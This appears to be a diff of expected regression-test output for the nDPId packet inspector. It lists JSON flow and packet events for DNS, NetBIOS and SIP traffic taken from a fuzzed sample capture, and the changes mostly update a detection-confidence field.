+00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":164,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469924897,"flow_last_seen":1120469924897,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469924897,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.17","src_port":2736,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":165,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":2,"flow_last_seen":1120469926899,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469926899,"pkt":"QDBUADRWAODtAW69CABFAABIaj0AAIARTRTAqAECwKgBAQqwADUANK04fNwBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":166,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":64,"flow_packet_id":3,"flow_last_seen":1120469930905,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469930905,"pkt":"ADBUADRWAODtAW69CABFAABIaj4AAIARTRPAqAECwKgBAQqwADUANK04fNwBAACBAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 
-00919{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":166,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120469921898,"flow_last_seen":1120469930905,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469930905,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2736,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":167,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120469697460,"flow_last_seen":1120469697462,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120469930905,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2725,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 
-00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":167,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120469697468,"flow_last_seen":1120469697468,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120469930905,"l3_proto":"ip4","src_ip":"192.168.1.46","dst_ip":"192.168.1.2","src_port":53,"dst_port":2726,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} -00695{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":167,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1120469540839,"flow_last_seen":1120469923705,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":1000,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120469930905,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} +00919{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":166,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120469921898,"flow_last_seen":1120469930905,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469930905,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2736,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": 
{"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":167,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120469697460,"flow_last_seen":1120469697462,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120469930905,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2725,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":167,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120469697468,"flow_last_seen":1120469697468,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120469930905,"l3_proto":"ip4","src_ip":"192.168.1.46","dst_ip":"192.168.1.2","src_port":53,"dst_port":2726,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 
+00695{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":167,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1120469540839,"flow_last_seen":1120469923705,"flow_idle_time":200000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":1000,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1120469930905,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":167,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469938907,"flow_last_seen":1120469938907,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120469938907,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2737,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00503{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":167,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":1,"flow_last_seen":1120469938907,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120469938907,"pkt":"ADBUADRWAODtAW69CABFAABEaj8AAIARTRbAqAECwKgBAQqxADUAMAoxGt0AAAABAAAAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAQ=="} 
-00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":167,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469938907,"flow_last_seen":1120469938907,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120469938907,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2737,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00786{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":167,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469938907,"flow_last_seen":1120469938907,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120469938907,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2737,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00533{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":168,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":2,"flow_last_seen":1120469938908,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120469938908,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAF8Rtz7AqAEBwKgBAgA1CrEAR+ysGt2AAAABAAEAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAVgwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3QA"} -00796{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":168,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120469938907,"flow_last_seen":1120469938908,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120469938908,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2737,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}} +00796{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":168,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120469938907,"flow_last_seen":1120469938908,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120469938908,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2737,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}} 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":169,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469938910,"flow_last_seen":1120469938910,"flow_idle_time":200000,"flow_min_l4_payload_len":467,"flow_max_l4_payload_len":467,"flow_tot_l4_payload_len":467,"flow_avg_l4_payload_len":467,"midstream":0,"thread_ts_msec":1120469938910,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.35","src_port":20932,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01074{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":169,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":1,"flow_last_seen":1120469938910,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":509,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":509,"pkt_l4_len":475,"thread_ts_msec":1120469938910,"pkt":"ADBUADRWAODtAW69CABFAAHvakAAAIARFv7AqAEC1PIhI1HEE8QB28mlUkVHSVNURVIgc2lwOnNpcC5jeWJlcmNpdHkuZGsgU0lQLzIuMA0KVmlhOiBTSVAvMi4wL1VEUCAxOTIuMTY4LjEuMjticmFuY2g9ejloRzRiS25wMTE0NjM5MDAwLTQ3N2U3NTkxMTkyLjE2OC4xLjI7JXMAcnQNCkZyb206IDxzaXA6dm9pMTgwNjJAc2lwLmN5YmVyY2l0eS5k9T47dGFnPTZkNTQwYTUNClRvOiA8c2lwOnZvaTE4MDYyQHNpcC5jeWJlcmNpdHlzZGs+DQpDYWxuLUlEOiA1NzgyVDI3MjktNDY2NWQ3NzVANTc4MjIyNzMyLTQ2NjVkNzcyDQpDb250YWN0OiAgPHNpcDp2b2kxODA2MkAxOTIuMTY4LjEuMjo1MDYwO2xpbmU9YWNhNmI5N2NhM2Y1MTUxYT47ZXhwaXJlcx0xMjAwO3E9MC41MDANCkV4cGlyZXM6IDEyMDANe0NTZXE6IDc0IFLPR0lTVEVSDQpDb250ZUF0LUxlbmd0aDogMA0KTWF4LUZvcglhcmRzOiA3MA0KaXNlci1BZ2VudDogTmVybyBTSVBQUyBJUCBQaG9uZSBWZXJzaW9uIDIuMC41MS4xNl8KDQo="} 
-00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":169,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469938910,"flow_last_seen":1120469938910,"flow_idle_time":200000,"flow_min_l4_payload_len":467,"flow_max_l4_payload_len":467,"flow_tot_l4_payload_len":467,"flow_avg_l4_payload_len":467,"midstream":0,"thread_ts_msec":1120469938910,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.35","src_port":20932,"dst_port":5060,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} +00653{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":169,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469938910,"flow_last_seen":1120469938910,"flow_idle_time":200000,"flow_min_l4_payload_len":467,"flow_max_l4_payload_len":467,"flow_tot_l4_payload_len":467,"flow_avg_l4_payload_len":467,"midstream":0,"thread_ts_msec":1120469938910,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.35","src_port":20932,"dst_port":5060,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":171,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469939223,"flow_last_seen":1120469939223,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469939223,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.84.1","src_port":2738,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":171,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":1,"flow_last_seen":1120469939223,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469939223,"pkt":"ADBUADRWAODtAW69CABFAABIakEAAIARTRDAqAECwKhUAQqyADUANKY1g90BAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR1AmRrAAAhAAE="} -00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":171,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469939223,"flow_last_seen":1120469939223,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469939223,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.84.1","src_port":2738,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercitu.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":171,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469939223,"flow_last_seen":1120469939223,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469939223,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.84.1","src_port":2738,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"_sip._udp.sip.cybercitu.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":172,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469940218,"flow_last_seen":1120469940218,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469940218,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2738,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":172,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":1,"flow_last_seen":1120469940218,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469940218,"pkt":"ADBUADRWAODtAW69CABFAABIakIAAIARTQ\/AqAECwKgBAQqyADUANKY1g90BAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":172,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469940218,"flow_last_seen":1120469940218,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469940218,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2738,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":172,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469940218,"flow_last_seen":1120469940218,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469940218,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2738,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":173,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":2,"flow_last_seen":1120469942221,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469942221,"pkt":"ADBUADRWAODtAW69CABFAABIakMAAIARTQ7AqAECwKgBAQqyADUANKY1g90BAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":176,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469944224,"flow_last_seen":1120469944224,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469944224,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2716,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":176,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":1,"flow_last_seen":1120469944224,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469944224,"pkt":"ADBUADRWAODtAW69CABFAABIakQAAIARTQ3AqAECwKgBAQqcADUANKY1g90BAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} -00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":176,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469944224,"flow_last_seen":1120469944224,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469944224,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2716,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":176,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469944224,"flow_last_seen":1120469944224,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120469944224,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2716,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00507{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":177,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":3,"flow_last_seen":1120469948230,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120469948230,"pkt":"ADBUADRWAODtAW69CABFAABIakUAAIARTQzAqAECwKgBAQqyADUANKY1g90BAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":178,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469956232,"flow_last_seen":1120469956232,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120469956232,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2739,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":178,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":1,"flow_last_seen":1120469956232,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120469956232,"pkt":"ADBUADRWAODtAW69CABFAABEakYAAIARTQ\/AqAECwKgBAQqzADUAMLotat4AAAABAAAAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAQ=="} 